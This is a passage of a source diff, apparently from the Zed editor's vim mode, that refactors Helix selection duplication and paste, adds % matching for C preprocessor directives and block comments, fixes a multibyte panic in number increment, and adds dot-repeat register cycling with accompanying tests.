+35,7 @@ impl Vim { window: &mut Window, cx: &mut Context, ) { - self.duplicate_selections( - times, - window, - cx, - &|prev_point| *prev_point.row_mut() = prev_point.row().0.saturating_sub(1), - &|prev_range, _| prev_range.start.row() == DisplayPoint::zero().row(), - true, - ); + self.duplicate_selections(times, window, cx, Direction::Above); } fn duplicate_selections( @@ -49,9 +43,7 @@ impl Vim { times: Option, window: &mut Window, cx: &mut Context, - advance_search: &dyn Fn(&mut DisplayPoint), - end_search: &dyn Fn(&Range, &DisplaySnapshot) -> bool, - above: bool, + direction: Direction, ) { let times = times.unwrap_or(1); self.update_editor(cx, |_, editor, cx| { @@ -59,7 +51,7 @@ impl Vim { let map = editor.display_snapshot(cx); let mut original_selections = editor.selections.all_display(&map); // The order matters, because it is recorded when the selections are added. - if above { + if matches!(direction, Direction::Above) { original_selections.reverse(); } @@ -68,12 +60,9 @@ impl Vim { selections.push(display_point_range_to_offset_range(&origin, &map)); let mut last_origin = origin; for _ in 1..=times { - if let Some(duplicate) = find_next_valid_duplicate_space( - last_origin.clone(), - &map, - &advance_search, - &end_search, - ) { + if let Some(duplicate) = + find_next_valid_duplicate_space(last_origin.clone(), &map, direction) + { selections.push(display_point_range_to_offset_range(&duplicate, &map)); last_origin = duplicate; } else { @@ -90,22 +79,62 @@ impl Vim { } fn find_next_valid_duplicate_space( - mut origin: Range, + origin: Range, map: &DisplaySnapshot, - advance_search: &impl Fn(&mut DisplayPoint), - end_search: &impl Fn(&Range, &DisplaySnapshot) -> bool, + direction: Direction, ) -> Option> { - while !end_search(&origin, map) { - advance_search(&mut origin.start); - advance_search(&mut origin.end); + let buffer = map.buffer_snapshot(); + let start_col_utf16 = buffer + .point_to_point_utf16(origin.start.to_point(map)) + .column; + let end_col_utf16 = buffer.point_to_point_utf16(origin.end.to_point(map)).column; - if map.clip_point(origin.start, Bias::Left) == origin.start - && map.clip_point(origin.end, Bias::Right) == origin.end + let mut candidate = origin; + loop { + match direction { + Direction::Below => { + if candidate.end.row() >= map.max_point().row() { + return None; + } + *candidate.start.row_mut() += 1; + *candidate.end.row_mut() += 1; + } + Direction::Above => { + if candidate.start.row() == DisplayPoint::zero().row() { + return None; + } + *candidate.start.row_mut() = candidate.start.row().0.saturating_sub(1); + *candidate.end.row_mut() = candidate.end.row().0.saturating_sub(1); + } + } + + let start_row = DisplayPoint::new(candidate.start.row(), 0) + .to_point(map) + .row; + let end_row = DisplayPoint::new(candidate.end.row(), 0).to_point(map).row; + + if start_col_utf16 > buffer.line_len_utf16(MultiBufferRow(start_row)) + || end_col_utf16 > buffer.line_len_utf16(MultiBufferRow(end_row)) { - return Some(origin); + continue; + } + + let start_col = buffer + .point_utf16_to_point(PointUtf16::new(start_row, start_col_utf16)) + .column; + let end_col = buffer + .point_utf16_to_point(PointUtf16::new(end_row, end_col_utf16)) + .column; + + let candidate_start = DisplayPoint::new(candidate.start.row(), start_col); + let candidate_end = DisplayPoint::new(candidate.end.row(), end_col); + + if map.clip_point(candidate_start, Bias::Left) == candidate_start + && map.clip_point(candidate_end, Bias::Right) == candidate_end + { + return Some(candidate_start..candidate_end); } } - None } fn display_point_range_to_offset_range( @@ -231,4 +260,54 @@ mod tests { Mode::HelixNormal, ); } + + #[gpui::test] + async fn test_selection_duplication_multiline_multibyte(cx: &mut gpui::TestAppContext) { + let mut cx = VimTestContext::new(cx, true).await; + cx.enable_helix(); + + // Multiline selection on rows with multibyte chars should preserve + // the visual column on both start and end rows. + cx.set_state( + indoc! {" + «H䡻llo + Hëllo + Hallo"}, + Mode::HelixNormal, + ); + + cx.simulate_keystrokes("C"); + + cx.assert_state( + indoc! {" + «H䡻llo + «H롻llo + Hallo"}, + Mode::HelixNormal, + ); + } + + #[gpui::test] + async fn test_selection_duplication_multibyte(cx: &mut gpui::TestAppContext) { + let mut cx = VimTestContext::new(cx, true).await; + cx.enable_helix(); + + // Selection on a line with multibyte chars should duplicate to the + // same character column on the next line, not skip it. + cx.set_state( + indoc! {" + H«äˇ»llo + Hallo"}, + Mode::HelixNormal, + ); + + cx.simulate_keystrokes("C"); + + cx.assert_state( + indoc! {" + H«äˇ»llo + H«aˇ»llo"}, + Mode::HelixNormal, + ); + } } diff --git a/crates/vim/src/helix/paste.rs b/crates/vim/src/helix/paste.rs index 32f636b41046a5f8c8ade054594218890e23758f..c43281421462ee66e75d226b8769367f4db417b9 100644 --- a/crates/vim/src/helix/paste.rs +++ b/crates/vim/src/helix/paste.rs @@ -33,16 +33,14 @@ impl Vim { let selected_register = vim.selected_register.take(); - let Some((text, clipboard_selections)) = Vim::update_globals(cx, |globals, cx| { + let Some(register) = Vim::update_globals(cx, |globals, cx| { globals.read_register(selected_register, Some(editor), cx) }) - .and_then(|reg| { - (!reg.text.is_empty()) - .then_some(reg.text) - .zip(reg.clipboard_selections) - }) else { + .filter(|reg| !reg.text.is_empty()) else { return; }; + let text = register.text; + let clipboard_selections = register.clipboard_selections; let display_map = editor.display_snapshot(cx); let current_selections = editor.selections.all_adjusted_display(&display_map); @@ -63,7 +61,9 @@ impl Vim { let mut replacement_texts: Vec = Vec::new(); for ix in 0..current_selections.len() { - let to_insert = if let Some(clip_sel) = clipboard_selections.get(ix) { + let to_insert = if let Some(clip_sel) = + clipboard_selections.as_ref().and_then(|s| s.get(ix)) + { let end_offset = start_offset + clip_sel.len; let text = text[start_offset..end_offset].to_string(); start_offset = if clip_sel.is_entire_line { @@ -102,13 +102,16 @@ impl Vim { } else if action.before { sel.start } else if sel.start == sel.end { - // Helix and Zed differ in how they understand - // single-point cursors. In Helix, a single-point cursor - // is "on top" of some character, and pasting after that - // cursor means that the pasted content should go after - // that character. (If the cursor is at the end of a - // line, the pasted content goes on the next line.) - movement::right(&display_map, sel.end) + // In Helix, a single-point cursor is "on top" of a + // character, and pasting after means after that character. + // At line end this means the next line. But on an empty + // line there is no character, so paste at the cursor. + let right = movement::right(&display_map, sel.end); + if right.row() != sel.end.row() && sel.end.column() == 0 { + sel.end + } else { + right + } } else { sel.end }; @@ -146,8 +149,58 @@ impl Vim { mod test { use indoc::indoc; + use gpui::ClipboardItem; + use crate::{state::Mode, test::VimTestContext}; + #[gpui::test] + async fn test_system_clipboard_paste(cx: &mut gpui::TestAppContext) { + let mut cx = VimTestContext::new(cx, true).await; + cx.enable_helix(); + cx.set_state( + indoc! {" + The quiˇck brown + fox jumps over + the lazy dog."}, + Mode::HelixNormal, + ); + + cx.write_to_clipboard(ClipboardItem::new_string("clipboard".to_string())); + cx.simulate_keystrokes("p"); + cx.assert_state( + indoc! {" + The quic«clipboardˇ»k brown + fox jumps over + the lazy dog."}, + Mode::HelixNormal, + ); + + // Multiple cursors with system clipboard (no metadata) pastes + // the same text at each cursor. + cx.set_state( + indoc! {" + ˇThe quick brown + fox ˇjumps over + the lazy dog."}, + Mode::HelixNormal, + ); + cx.write_to_clipboard(ClipboardItem::new_string("hi".to_string())); + cx.simulate_keystrokes("p"); + cx.assert_state( + indoc! {" + T«hiˇ»he quick brown + fox j«hiˇ»umps over + the lazy dog."}, + Mode::HelixNormal, + ); + + // Multiple cursors on empty lines should paste on those same lines. + cx.set_state("ˇ\nˇ\nˇ\nend", Mode::HelixNormal); + cx.write_to_clipboard(ClipboardItem::new_string("X".to_string())); + cx.simulate_keystrokes("p"); + cx.assert_state("«Xˇ»\n«Xˇ»\n«Xˇ»\nend", Mode::HelixNormal); + } + #[gpui::test] async fn test_paste(cx: &mut gpui::TestAppContext) { let mut cx = VimTestContext::new(cx, true).await; diff --git a/crates/vim/src/motion.rs b/crates/vim/src/motion.rs index 5161d77e06778091acd259994f1904b84e05acda..6e992704f54bf7aba3cc775d906a90281234dbd0 100644 --- a/crates/vim/src/motion.rs +++ b/crates/vim/src/motion.rs @@ -1,16 +1,18 @@ use editor::{ Anchor, Bias, BufferOffset, DisplayPoint, Editor, MultiBufferOffset, RowExt, ToOffset, + ToPoint as _, display_map::{DisplayRow, DisplaySnapshot, FoldPoint, ToDisplayPoint}, movement::{ self, FindRange, TextLayoutDetails, find_boundary, find_preceding_boundary_display_point, }, }; use gpui::{Action, Context, Window, actions, px}; -use language::{CharKind, Point, Selection, SelectionGoal}; +use language::{CharKind, Point, Selection, SelectionGoal, TextObject, TreeSitterOptions}; use multi_buffer::MultiBufferRow; use schemars::JsonSchema; use serde::Deserialize; use std::{f64, ops::Range}; + use workspace::searchable::Direction; use crate::{ @@ -1924,9 +1926,10 @@ fn next_subword_start( let found_subword_start = is_subword_start(left, right, ".$_-"); let is_word_start = (left_kind != right_kind) && (!right.is_ascii_punctuation() || is_stopping_punct(right)); + let found = (!right.is_whitespace() && (is_word_start || found_subword_start)) || at_newline && crossed_newline - || at_newline && left == '\n'; // Prevents skipping repeated empty lines + || right == '\n' && left == '\n'; // Prevents skipping repeated empty lines crossed_newline |= at_newline; found @@ -2339,39 +2342,19 @@ fn start_of_next_sentence( fn go_to_line(map: &DisplaySnapshot, display_point: DisplayPoint, line: usize) -> DisplayPoint { let point = map.display_point_to_point(display_point, Bias::Left); - let Some(mut excerpt) = map.buffer_snapshot().excerpt_containing(point..point) else { + let snapshot = map.buffer_snapshot(); + let Some((buffer_snapshot, _)) = snapshot.point_to_buffer_point(point) else { + return display_point; + }; + + let Some(anchor) = snapshot.anchor_in_excerpt(buffer_snapshot.anchor_after( + buffer_snapshot.clip_point(Point::new((line - 1) as u32, point.column), Bias::Left), + )) else { return display_point; }; - let offset = excerpt.buffer().point_to_offset( - excerpt - .buffer() - .clip_point(Point::new((line - 1) as u32, point.column), Bias::Left), - ); - let buffer_range = excerpt.buffer_range(); - if offset >= buffer_range.start.0 && offset <= buffer_range.end.0 { - let point = map - .buffer_snapshot() - .offset_to_point(excerpt.map_offset_from_buffer(BufferOffset(offset))); - return map.clip_point(map.point_to_display_point(point, Bias::Left), Bias::Left); - } - for (excerpt, buffer, range) in map.buffer_snapshot().excerpts() { - let excerpt_range = language::ToOffset::to_offset(&range.context.start, buffer) - ..language::ToOffset::to_offset(&range.context.end, buffer); - if offset >= excerpt_range.start && offset <= excerpt_range.end { - let text_anchor = buffer.anchor_after(offset); - let anchor = Anchor::in_buffer(excerpt, text_anchor); - return anchor.to_display_point(map); - } else if offset <= excerpt_range.start { - let anchor = Anchor::in_buffer(excerpt, range.context.start); - return anchor.to_display_point(map); - } - } map.clip_point( - map.point_to_display_point( - map.buffer_snapshot().clip_point(point, Bias::Left), - Bias::Left, - ), + map.point_to_display_point(anchor.to_point(snapshot), Bias::Left), Bias::Left, ) } @@ -2468,6 +2451,10 @@ fn find_matching_bracket_text_based( .take_while(|(_, char_offset)| *char_offset < line_range.end) .find_map(|(ch, char_offset)| get_bracket_pair(ch).map(|info| (info, char_offset))); + if bracket_info.is_none() { + return find_matching_c_preprocessor_directive(map, line_range); + } + let (open, close, is_opening) = bracket_info?.0; let bracket_offset = bracket_info?.1; @@ -2499,6 +2486,122 @@ fn find_matching_bracket_text_based( None } +fn find_matching_c_preprocessor_directive( + map: &DisplaySnapshot, + line_range: Range, +) -> Option { + let line_start = map + .buffer_chars_at(line_range.start) + .skip_while(|(c, _)| *c == ' ' || *c == '\t') + .map(|(c, _)| c) + .take(6) + .collect::(); + + if line_start.starts_with("#if") + || line_start.starts_with("#else") + || line_start.starts_with("#elif") + { + let mut depth = 0i32; + for (ch, char_offset) in map.buffer_chars_at(line_range.end) { + if ch != '\n' { + continue; + } + let mut line_offset = char_offset + '\n'.len_utf8(); + + // Skip leading whitespace + map.buffer_chars_at(line_offset) + .take_while(|(c, _)| *c == ' ' || *c == '\t') + .for_each(|(_, _)| line_offset += 1); + + // Check what directive starts the next line + let next_line_start = map + .buffer_chars_at(line_offset) + .map(|(c, _)| c) + .take(6) + .collect::(); + + if next_line_start.starts_with("#if") { + depth += 1; + } else if next_line_start.starts_with("#endif") { + if depth > 0 { + depth -= 1; + } else { + return Some(line_offset); + } + } else if next_line_start.starts_with("#else") || next_line_start.starts_with("#elif") { + if depth == 0 { + return Some(line_offset); + } + } + } + } else if line_start.starts_with("#endif") { + let mut depth = 0i32; + for (ch, char_offset) in + map.reverse_buffer_chars_at(line_range.start.saturating_sub_usize(1)) + { + let mut line_offset = if char_offset == MultiBufferOffset(0) { + MultiBufferOffset(0) + } else if ch != '\n' { + continue; + } else { + char_offset + '\n'.len_utf8() + }; + + // Skip leading whitespace + map.buffer_chars_at(line_offset) + .take_while(|(c, _)| *c == ' ' || *c == '\t') + .for_each(|(_, _)| line_offset += 1); + + // Check what directive starts this line + let line_start = map + .buffer_chars_at(line_offset) + .skip_while(|(c, _)| *c == ' ' || *c == '\t') + .map(|(c, _)| c) + .take(6) + .collect::(); + + if line_start.starts_with("\n\n") { + // empty line + continue; + } else if line_start.starts_with("#endif") { + depth += 1; + } else if line_start.starts_with("#if") { + if depth > 0 { + depth -= 1; + } else { + return Some(line_offset); + } + } + } + } + None +} + +fn comment_delimiter_pair( + map: &DisplaySnapshot, + offset: MultiBufferOffset, +) -> Option<(Range, Range)> { + let snapshot = map.buffer_snapshot(); + snapshot + .text_object_ranges(offset..offset, TreeSitterOptions::default()) + .find_map(|(range, obj)| { + if !matches!(obj, TextObject::InsideComment | TextObject::AroundComment) + || !range.contains(&offset) + { + return None; + } + + let mut chars = snapshot.chars_at(range.start); + if (Some('/'), Some('*')) != (chars.next(), chars.next()) { + return None; + } + + let open_range = range.start..range.start + 2usize; + let close_range = range.end - 2..range.end; + Some((open_range, close_range)) + }) +} + fn matching( map: &DisplaySnapshot, display_point: DisplayPoint, @@ -2626,6 +2729,32 @@ fn matching( continue; } + if let Some((open_range, close_range)) = comment_delimiter_pair(map, offset) { + if open_range.contains(&offset) { + return close_range.start.to_display_point(map); + } + + if close_range.contains(&offset) { + return open_range.start.to_display_point(map); + } + + let open_candidate = (open_range.start >= offset + && line_range.contains(&open_range.start)) + .then_some((open_range.start.saturating_sub(offset), close_range.start)); + + let close_candidate = (close_range.start >= offset + && line_range.contains(&close_range.start)) + .then_some((close_range.start.saturating_sub(offset), open_range.start)); + + if let Some((_, destination)) = [open_candidate, close_candidate] + .into_iter() + .flatten() + .min_by_key(|(distance, _)| *distance) + { + return destination.to_display_point(map); + } + } + closest_pair_destination .map(|destination| destination.to_display_point(map)) .unwrap_or_else(|| { @@ -3514,6 +3643,119 @@ mod test { ); } + #[gpui::test] + async fn test_matching_comments(cx: &mut gpui::TestAppContext) { + let mut cx = NeovimBackedTestContext::new(cx).await; + + cx.set_shared_state(indoc! {r"ˇ/* + this is a comment + */"}) + .await; + cx.simulate_shared_keystrokes("%").await; + cx.shared_state().await.assert_eq(indoc! {r"/* + this is a comment + ˇ*/"}); + cx.simulate_shared_keystrokes("%").await; + cx.shared_state().await.assert_eq(indoc! {r"ˇ/* + this is a comment + */"}); + cx.simulate_shared_keystrokes("%").await; + cx.shared_state().await.assert_eq(indoc! {r"/* + this is a comment + ˇ*/"}); + + cx.set_shared_state("ˇ// comment").await; + cx.simulate_shared_keystrokes("%").await; + cx.shared_state().await.assert_eq("ˇ// comment"); + } + + #[gpui::test] + async fn test_matching_preprocessor_directives(cx: &mut gpui::TestAppContext) { + let mut cx = NeovimBackedTestContext::new(cx).await; + + cx.set_shared_state(indoc! {r"#ˇif + + #else + + #endif + "}) + .await; + cx.simulate_shared_keystrokes("%").await; + cx.shared_state().await.assert_eq(indoc! {r"#if + + ˇ#else + + #endif + "}); + + cx.simulate_shared_keystrokes("%").await; + cx.shared_state().await.assert_eq(indoc! {r"#if + + #else + + ˇ#endif + "}); + + cx.simulate_shared_keystrokes("%").await; + cx.shared_state().await.assert_eq(indoc! {r"ˇ#if + + #else + + #endif + "}); + + cx.set_shared_state(indoc! {r" + #ˇif + #if + + #else + + #endif + + #else + #endif + "}) + .await; + + cx.simulate_shared_keystrokes("%").await; + cx.shared_state().await.assert_eq(indoc! {r" + #if + #if + + #else + + #endif + + ˇ#else + #endif + "}); + + cx.simulate_shared_keystrokes("% %").await; + cx.shared_state().await.assert_eq(indoc! {r" + ˇ#if + #if + + #else + + #endif + + #else + #endif + "}); + cx.simulate_shared_keystrokes("j % % %").await; + cx.shared_state().await.assert_eq(indoc! {r" + #if + ˇ#if + + #else + + #endif + + #else + #endif + "}); + } + #[gpui::test] async fn test_unmatched_forward(cx: &mut gpui::TestAppContext) { let mut cx = NeovimBackedTestContext::new(cx).await; diff --git a/crates/vim/src/normal.rs b/crates/vim/src/normal.rs index 1501d29c7b9b712f3f8edc25025545d0fa0baa08..b54a0262744afddbefbd3d4ce5a737dfe3ee7502 100644 --- a/crates/vim/src/normal.rs +++ b/crates/vim/src/normal.rs @@ -731,10 +731,10 @@ impl Vim { .collect::>(); editor.edit_with_autoindent(edits, cx); editor.change_selections(Default::default(), window, cx, |s| { - s.move_cursors_with(&mut |map, cursor, _| { - let previous_line = map.start_of_relative_buffer_row(cursor, -1); + s.move_with(&mut |map, selection| { + let previous_line = map.start_of_relative_buffer_row(selection.start, -1); let insert_point = motion::end_of_line(map, false, previous_line, 1); - (insert_point, SelectionGoal::None) + selection.collapse_to(insert_point, SelectionGoal::None) }); }); }); @@ -750,14 +750,19 @@ impl Vim { self.start_recording(cx); self.switch_mode(Mode::Insert, false, window, cx); self.update_editor(cx, |_, editor, cx| { - let text_layout_details = editor.text_layout_details(window, cx); editor.transact(window, cx, |editor, window, cx| { let selections = editor.selections.all::(&editor.display_snapshot(cx)); let snapshot = editor.buffer().read(cx).snapshot(cx); let selection_end_rows: BTreeSet = selections .into_iter() - .map(|selection| selection.end.row) + .map(|selection| { + if !selection.is_empty() && selection.end.column == 0 { + selection.end.row.saturating_sub(1) + } else { + selection.end.row + } + }) .collect(); let edits = selection_end_rows .into_iter() @@ -772,14 +777,17 @@ impl Vim { }) .collect::>(); editor.change_selections(Default::default(), window, cx, |s| { - s.maybe_move_cursors_with(&mut |map, cursor, goal| { - Motion::CurrentLine.move_point( - map, - cursor, - goal, - None, - &text_layout_details, - ) + s.move_with(&mut |map, selection| { + let current_line = if !selection.is_empty() && selection.end.column() == 0 { + // If this is an insert after a selection to the end of the line, the + // cursor needs to be bumped back, because it'll be at the start of the + // *next* line. + map.start_of_relative_buffer_row(selection.end, -1) + } else { + selection.end + }; + let insert_point = motion::end_of_line(map, false, current_line, 1); + selection.collapse_to(insert_point, SelectionGoal::None) }); }); editor.edit_with_autoindent(edits, cx); @@ -924,7 +932,7 @@ impl Vim { Vim::take_forced_motion(cx); self.update_editor(cx, |vim, editor, cx| { let selection = editor.selections.newest_anchor(); - let Some((buffer, point, _)) = editor + let Some((buffer, point)) = editor .buffer() .read(cx) .point_to_buffer_point(selection.head(), cx) @@ -949,17 +957,16 @@ impl Vim { let current_line = point.row; let percentage = current_line as f32 / lines as f32; let modified = if buffer.is_dirty() { " [modified]" } else { "" }; - vim.status_label = Some( + vim.set_status_label( format!( "{}{} {} lines --{:.0}%--", filename, modified, lines, percentage * 100.0, - ) - .into(), + ), + cx, ); - cx.notify(); }); } diff --git a/crates/vim/src/normal/increment.rs b/crates/vim/src/normal/increment.rs index 9b6707fdb92520e95e874a5be143024beb21b873..9df8721301a82ed26618f7181ba80c43cbc702df 100644 --- a/crates/vim/src/normal/increment.rs +++ b/crates/vim/src/normal/increment.rs @@ -203,20 +203,25 @@ fn find_target( let start_offset = start.to_offset(snapshot); let end_offset = end.to_offset(snapshot); - let mut offset = start_offset; let mut first_char_is_num = snapshot - .chars_at(offset) + .chars_at(start_offset) .next() .map_or(false, |ch| ch.is_ascii_hexdigit()); let mut pre_char = String::new(); - let next_offset = offset + let next_offset = start_offset + snapshot .chars_at(start_offset) .next() .map_or(0, |ch| ch.len_utf8()); - // Backward scan to find the start of the number, but stop at start_offset + // Backward scan to find the start of the number, but stop at start_offset. + // We track `offset` as the start position of the current character. Initialize + // to `next_offset` and decrement at the start of each iteration so that `offset` + // always lands on a valid character boundary (not in the middle of a multibyte char). + let mut offset = next_offset; for ch in snapshot.reversed_chars_at(next_offset) { + offset -= ch.len_utf8(); + // Search boundaries if offset.0 == 0 || ch.is_whitespace() || (need_range && offset <= start_offset) { break; @@ -238,7 +243,6 @@ fn find_target( } pre_char.insert(0, ch); - offset -= ch.len_utf8(); } // The backward scan breaks on whitespace, including newlines. Without this @@ -895,4 +899,15 @@ mod test { .await .assert_eq("# Title\n2. item\nˇ2. item\n3. item"); } + + #[gpui::test] + async fn test_increment_with_multibyte_characters(cx: &mut gpui::TestAppContext) { + let mut cx = VimTestContext::new(cx, true).await; + + // Test cursor after a multibyte character - this would panic before the fix + // because the backward scan would land in the middle of the Korean character + cx.set_state("지ˇ1", Mode::Normal); + cx.simulate_keystrokes("ctrl-a"); + cx.assert_state("지ˇ2", Mode::Normal); + } } diff --git a/crates/vim/src/normal/paste.rs b/crates/vim/src/normal/paste.rs index ec964ec9ae3af08b108aa027a0aa62883dbcbcc5..fab9b353e3e9bb5b5d00d9d415783b4a5a31ae95 100644 --- a/crates/vim/src/normal/paste.rs +++ b/crates/vim/src/normal/paste.rs @@ -50,6 +50,10 @@ impl Vim { }) .filter(|reg| !reg.text.is_empty()) else { + vim.set_status_label( + format!("Nothing in register {}", selected_register.unwrap_or('"')), + cx, + ); return; }; let clipboard_selections = clipboard_selections @@ -249,7 +253,7 @@ impl Vim { ) { self.stop_recording(cx); let selected_register = self.selected_register.take(); - self.update_editor(cx, |_, editor, cx| { + self.update_editor(cx, |vim, editor, cx| { editor.transact(window, cx, |editor, window, cx| { editor.set_clip_at_line_ends(false, cx); editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| { @@ -262,6 +266,10 @@ impl Vim { globals.read_register(selected_register, Some(editor), cx) }) .filter(|reg| !reg.text.is_empty()) else { + vim.set_status_label( + format!("Nothing in register {}", selected_register.unwrap_or('"')), + cx, + ); return; }; editor.insert(&text, window, cx); @@ -286,7 +294,7 @@ impl Vim { ) { self.stop_recording(cx); let selected_register = self.selected_register.take(); - self.update_editor(cx, |_, editor, cx| { + self.update_editor(cx, |vim, editor, cx| { let text_layout_details = editor.text_layout_details(window, cx); editor.transact(window, cx, |editor, window, cx| { editor.set_clip_at_line_ends(false, cx); @@ -306,6 +314,10 @@ impl Vim { globals.read_register(selected_register, Some(editor), cx) }) .filter(|reg| !reg.text.is_empty()) else { + vim.set_status_label( + format!("Nothing in register {}", selected_register.unwrap_or('"')), + cx, + ); return; }; editor.insert(&text, window, cx); diff --git a/crates/vim/src/normal/repeat.rs b/crates/vim/src/normal/repeat.rs index 8a4bfc241d1b0c62b17464bfb1dd5076015ac638..387bca0912be303fbe86bf947446fe85a50d6022 100644 --- a/crates/vim/src/normal/repeat.rs +++ b/crates/vim/src/normal/repeat.rs @@ -291,6 +291,24 @@ impl Vim { }) else { return; }; + + // Dot repeat always uses the recorded register, ignoring any "X + // override, as the register is an inherent part of the recorded action. + // For numbered registers, Neovim increments on each dot repeat so after + // using `"1p`, using `.` will equate to `"2p", the next `.` to `"3p`, + // etc.. + let recorded_register = cx.global::().recorded_register_for_dot; + let next_register = recorded_register + .filter(|c| matches!(c, '1'..='9')) + .map(|c| ((c as u8 + 1).min(b'9')) as char); + + self.selected_register = next_register.or(recorded_register); + if let Some(next_register) = next_register { + Vim::update_globals(cx, |globals, _| { + globals.recorded_register_for_dot = Some(next_register) + }) + }; + if mode != Some(self.mode) { if let Some(mode) = mode { self.switch_mode(mode, false, window, cx) @@ -441,6 +459,207 @@ mod test { cx.shared_state().await.assert_eq("THE QUICK ˇbrown fox"); } + #[gpui::test] + async fn test_dot_repeat_registers_paste(cx: &mut gpui::TestAppContext) { + let mut cx = NeovimBackedTestContext::new(cx).await; + + // basic paste repeat uses the unnamed register + cx.set_shared_state("ˇhello\n").await; + cx.simulate_shared_keystrokes("y y p").await; + cx.shared_state().await.assert_eq("hello\nˇhello\n"); + cx.simulate_shared_keystrokes(".").await; + cx.shared_state().await.assert_eq("hello\nhello\nˇhello\n"); + + // "_ (blackhole) is recorded and replayed, so the pasted text is still + // the original yanked line. + cx.set_shared_state(indoc! {" + ˇone + two + three + four + "}) + .await; + cx.simulate_shared_keystrokes("y y j \" _ d d . p").await; + cx.shared_state().await.assert_eq(indoc! {" + one + four + ˇone + "}); + + // the recorded register is replayed, not whatever is in the unnamed register + cx.set_shared_state(indoc! {" + ˇone + two + "}) + .await; + cx.simulate_shared_keystrokes("y y j \" a y y \" a p .") + .await; + cx.shared_state().await.assert_eq(indoc! {" + one + two + two + ˇtwo + "}); + + // `"X.` ignores the override and always uses the recorded register. + // Both `dd` calls go into register `a`, so register `b` is empty and + // `"bp` pastes nothing. + cx.set_shared_state(indoc! {" + ˇone + two + three + "}) + .await; + cx.simulate_shared_keystrokes("\" a d d \" b .").await; + cx.shared_state().await.assert_eq(indoc! {" + ˇthree + "}); + cx.simulate_shared_keystrokes("\" a p \" b p").await; + cx.shared_state().await.assert_eq(indoc! {" + three + ˇtwo + "}); + + // numbered registers cycle on each dot repeat: "1p . . uses registers 2, 3, … + // Since the cycling behavior caps at register 9, the first line to be + // deleted `1`, is no longer in any of the registers. + cx.set_shared_state(indoc! {" + ˇone + two + three + four + five + six + seven + eight + nine + ten + "}) + .await; + cx.simulate_shared_keystrokes("d d . . . . . . . . .").await; + cx.shared_state().await.assert_eq(indoc! {"ˇ"}); + cx.simulate_shared_keystrokes("\" 1 p . . . . . . . . .") + .await; + cx.shared_state().await.assert_eq(indoc! {" + + ten + nine + eight + seven + six + five + four + three + two + ˇtwo"}); + + // unnamed register repeat: dd records None, so . pastes the same + // deleted text + cx.set_shared_state(indoc! {" + ˇone + two + three + "}) + .await; + cx.simulate_shared_keystrokes("d d p .").await; + cx.shared_state().await.assert_eq(indoc! {" + two + one + ˇone + three + "}); + + // After `"1p` cycles to `2`, using `"ap` resets recorded_register to `a`, + // so the next `.` uses `a` and not 3. + cx.set_shared_state(indoc! {" + one + two + ˇthree + "}) + .await; + cx.simulate_shared_keystrokes("\" 2 y y k k \" a y y j \" 1 y y k \" 1 p . \" a p .") + .await; + cx.shared_state().await.assert_eq(indoc! {" + one + two + three + one + ˇone + two + three + "}); + } + + // This needs to be a separate test from `test_dot_repeat_registers_paste` + // as Neovim doesn't have support for using registers in replace operations + // by default. + #[gpui::test] + async fn test_dot_repeat_registers_replace(cx: &mut gpui::TestAppContext) { + let mut cx = VimTestContext::new(cx, true).await; + + cx.set_state( + indoc! {" + line ˇone + line two + line three + "}, + Mode::Normal, + ); + + // 1. Yank `one` into register `a` + // 2. Move down and yank `two` into the default register + // 3. Replace `two` with the contents of register `a` + cx.simulate_keystrokes("\" a y w j y w \" a g R w"); + cx.assert_state( + indoc! {" + line one + line onˇe + line three + "}, + Mode::Normal, + ); + + // 1. Move down to `three` + // 2. Repeat the replace operation + cx.simulate_keystrokes("j ."); + cx.assert_state( + indoc! {" + line one + line one + line onˇe + "}, + Mode::Normal, + ); + + // Similar test, but this time using numbered registers, as those should + // automatically increase on successive uses of `.` . + cx.set_state( + indoc! {" + line ˇone + line two + line three + line four + "}, + Mode::Normal, + ); + + // 1. Yank `one` into register `1` + // 2. Yank `two` into register `2` + // 3. Move down and yank `three` into the default register + // 4. Replace `three` with the contents of register `1` + // 5. Move down and repeat + cx.simulate_keystrokes("\" 1 y w j \" 2 y w j y w \" 1 g R w j ."); + cx.assert_state( + indoc! {" + line one + line two + line one + line twˇo + "}, + Mode::Normal, + ); + } + #[gpui::test] async fn test_repeat_ime(cx: &mut gpui::TestAppContext) { let mut cx = VimTestContext::new(cx, true).await; diff --git a/crates/vim/src/normal/scroll.rs b/crates/vim/src/normal/scroll.rs index 9d61aea9525b939271631feb6d493df2871a9607..01719cd59325f35474f10775488fd2aea4f38e41 100644 --- a/crates/vim/src/normal/scroll.rs +++ b/crates/vim/src/normal/scroll.rs @@ -88,82 +88,74 @@ pub fn register(editor: &mut Editor, cx: &mut Context) { impl Vim { fn scroll( &mut self, - move_cursor: bool, + preserve_cursor_position: bool, window: &mut Window, cx: &mut Context, by: fn(c: Option) -> ScrollAmount, ) { let amount = by(Vim::take_count(cx).map(|c| c as f32)); - let mode = self.mode; Vim::take_forced_motion(cx); self.exit_temporary_normal(window, cx); - self.update_editor(cx, |_, editor, cx| { - scroll_editor(editor, mode, move_cursor, amount, window, cx) - }); + self.scroll_editor(preserve_cursor_position, amount, window, cx); } -} -fn scroll_editor( - editor: &mut Editor, - mode: Mode, - preserve_cursor_position: bool, - amount: ScrollAmount, - window: &mut Window, - cx: &mut Context, -) { - let should_move_cursor = editor.newest_selection_on_screen(cx).is_eq(); - let display_snapshot = editor.display_map.update(cx, |map, cx| map.snapshot(cx)); - let old_top = editor - .scroll_manager - .scroll_top_display_point(&display_snapshot, cx); - - if editor.scroll_hover(amount, window, cx) { - return; - } + fn scroll_editor( + &mut self, + preserve_cursor_position: bool, + amount: ScrollAmount, + window: &mut Window, + cx: &mut Context, + ) { + self.update_editor(cx, |vim, editor, cx| { + let should_move_cursor = editor.newest_selection_on_screen(cx).is_eq(); + let display_snapshot = editor.display_map.update(cx, |map, cx| map.snapshot(cx)); + let old_top = editor + .scroll_manager + .scroll_top_display_point(&display_snapshot, cx); + + if editor.scroll_hover(amount, window, cx) { + return; + } - let full_page_up = amount.is_full_page() && amount.direction().is_upwards(); - let amount = match (amount.is_full_page(), editor.visible_line_count()) { - (true, Some(visible_line_count)) => { - if amount.direction().is_upwards() { - ScrollAmount::Line((amount.lines(visible_line_count) + 1.0) as f32) - } else { - ScrollAmount::Line((amount.lines(visible_line_count) - 1.0) as f32) + let full_page_up = amount.is_full_page() && amount.direction().is_upwards(); + let amount = match (amount.is_full_page(), editor.visible_line_count()) { + (true, Some(visible_line_count)) => { + if amount.direction().is_upwards() { + ScrollAmount::Line((amount.lines(visible_line_count) + 1.0) 